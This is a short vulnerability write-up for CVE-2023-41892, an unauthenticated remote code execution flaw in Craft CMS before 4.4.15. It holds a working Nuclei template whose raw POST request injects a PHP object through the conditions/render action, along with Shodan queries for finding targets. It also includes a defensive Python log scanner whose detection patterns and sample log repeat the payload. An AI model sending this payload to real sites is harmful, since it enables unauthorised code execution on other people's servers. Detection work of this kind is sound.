0x00 Preface
0x01 Vulnerability description
Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are advised to upgrade to at least that version to remediate the issue. This issue has been fixed in Craft CMS 4.4.15.
0x02 CVE number
CVE-2023-41892
0x03 Affected version
Craft CMS installations before 4.4.15 (fixed in 4.4.15).
0x04 Vulnerability details
id: CVE-2023-41892

info:
  name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
  reference:
    - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
    - https://blog.calif.io/p/craftcms-rce
    - https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
    - https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
    - https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 10
    cve-id: CVE-2023-41892
    cwe-id: CWE-94
    epss-score: 0.00044
    epss-percentile: 0.08209
  metadata:
    max-request: 1
    verified: true
    publicwww-query: "craftcms"
    shodan-query: http.favicon.hash:-47932290
  tags: cve,cve2023,rce,unauth,craftcms

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

    matchers:
      - type: word
        words:
          - "PHP Credits"
          - "PHP Group"
          - "CraftCMS"
        condition: and
        case-insensitive: true
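The template above probes the vulnerable conditions/render action with a crafted config JSON whose keys ("as <name>", "__construct()", "_fn_close") drive Yii object instantiation. As an added example (not from the original page, the Nuclei project or Craft CMS), the Python below scans request-log lines for that request shape so a defender can hunt for probes in web or WAF logs; the log layout is an assumption and the sample lines are constructed.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample log, one request per line as "<METHOD> <PATH> <url-encoded body>"
# (layout is an assumption; adapt the split in scan_log() to your own log format).
SAMPLE_LOG = """\
POST /index.php action=conditions/render&test%5BuserCondition%5D=craft%5Celements%5Cconditions%5Cusers%5CUserCondition&config=%7B%22name%22%3A%22test%5BuserCondition%5D%22%2C%22as%20xyz%22%3A%7B%22class%22%3A%22%5C%5CGuzzleHttp%5C%5CPsr7%5C%5CFnStream%22%2C%22__construct()%22%3A%5B%7B%22close%22%3Anull%7D%5D%2C%22_fn_close%22%3A%22phpinfo%22%7D%7D
POST /index.php action=users/login&loginName=editor&password=hunter2
POST /index.php action=conditions/render&config=%7B%22name%22%3A%22filter%22%2C%22class%22%3A%22craft%5C%5Celements%5C%5Cconditions%5C%5Cusers%5C%5CUserCondition%22%7D
"""

# Keys that only appear when the caller controls the Yii object config: behaviour
# attachment ("as <name>"), constructor arguments, and FnStream "_fn_<method>" callbacks.
SUSPICIOUS_KEY = re.compile(r"^(as\s.+|__construct\(\)|_fn_\w+)$")


def config_has_object_injection(config_json: str) -> bool:
    """True if any dict key at any depth of the JSON matches SUSPICIOUS_KEY."""
    try:
        cfg = json.loads(config_json)
    except ValueError:
        return False  # not JSON; the application itself will reject it
    stack = [cfg]
    while stack:
        node = stack.pop()
        if isinstance(node, dict):
            if any(SUSPICIOUS_KEY.match(k) for k in node):
                return True
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)
    return False


def is_cve_2023_41892_probe(body: str) -> bool:
    """Flag a body that calls conditions/render with a poisoned config parameter."""
    params = parse_qs(body, keep_blank_values=True)
    if "conditions/render" not in params.get("action", []):
        return False
    return any(config_has_object_injection(c) for c in params.get("config", []))


def scan_log(text: str) -> list:
    """Return (method, path) for every line whose body looks like the probe."""
    hits = []
    for line in text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) == 3 and is_cve_2023_41892_probe(parts[2]):
            hits.append((parts[0], parts[1]))
    return hits
```

Only the first sample line is reported; the benign conditions/render call with a plain Craft condition class in the third line is not, which keeps the rule usable on real traffic.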
0x05 Reference link
https://nvd.nist.gov/vuln/detail/CVE-2023-41892